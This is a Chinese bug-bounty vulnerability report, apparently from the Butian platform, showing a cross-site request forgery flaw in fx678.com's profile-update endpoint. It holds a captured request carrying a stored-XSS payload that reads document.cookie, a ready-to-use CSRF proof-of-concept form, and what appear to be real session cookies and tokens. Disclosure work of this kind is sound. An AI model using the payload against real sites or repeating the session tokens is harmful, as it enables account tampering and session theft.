补天 - 汇通网存在xsrf

漏洞挖掘

1、https://member.fx678.com/UserInfo/updateUserInfo

2、点击确定修改抓到如下数据包（构造为xsrf）

POST /UserInfo/updateInfo HTTP/1.1
Host: member.fx678.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; Hm_lpvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; UM_distinctid=1667de0cecb29e-06644d3658dcea8-1262694a-19a100-1667de0cecc32d; PHPSESSID=fe3tjehbisasi1lk6bbgar63h2; laravel_session=eyJpdiI6Ijh4SVwvMU52cml0NmtcLzN2bjQrcWlaZz09IiwidmFsdWUiOiJHOXY0VGhyNVVtTjNOcitwbXNkbmZSUWFydHYySllUTVwvSzVTVVVIeGtIVlRLdGp5aFF0YnU5RmdkRXNcL3RybW5hSjU3YmV2MFF4NWRGbWwwOFM5enNRPT0iLCJtYWMiOiJmMjljN2E0NjY5OGQ3N2Y4OTFjMzU1OGU0NmY5ZGI4NjU4OTc5Y2U3ZmEzNzRhOTMwOTM0OGY1NWViODNkNTY1In0%3D; login_token=fe3tjehbisasi1lk6bbgar63h2; resetTime=1539712313; username=%E5%88%98%E6%99%AF%E9%A1%BA; user_img=https%3A%2F%2Fmember.fx678.com%2F%2Fupload%2Fdefault.jpg; openId=1abf8858c84ed668e5f8a6a2ed552300; ticket=a4c4bd3608d586b8070e51000142607b; __root_domain_v=.fx678.com; _qddaz=QD.7kcvix.xboeyq.jnc30nw7
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
user_img=http://www.baidu.com/?"><img/src='x'/onerror=alert(document.cookie)>&real_name=&sex=2&tDate=&province=&city=&address=&qq=&job=&Nickname=onlyfree

然后构造为poc

<html>
  <body>
    <head>
        <meta charset="utf-8">
        <title>csrf漏洞测试</title>
    </head>
    <form action="https://member.fx678.com/UserInfo/updateInfo" method="POST">
      <input type="hidden" name="user_img" value="http&#58;&#47;&#47;www&#46;baidu&#46;com&#47;&#63;&quot;&gt;&lt;img&#47;src&#61;&apos;x&apos;&#47;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="real_name" value="" />
      <input type="hidden" name="sex" value="2" />
      <input type="hidden" name="tDate" value="" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="job" value="" />
      <input type="hidden" name="Nickname" value="onlyfree" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="提交" />
    </form>
  </body>
</html>

然后打开一下

然后查看是否弹窗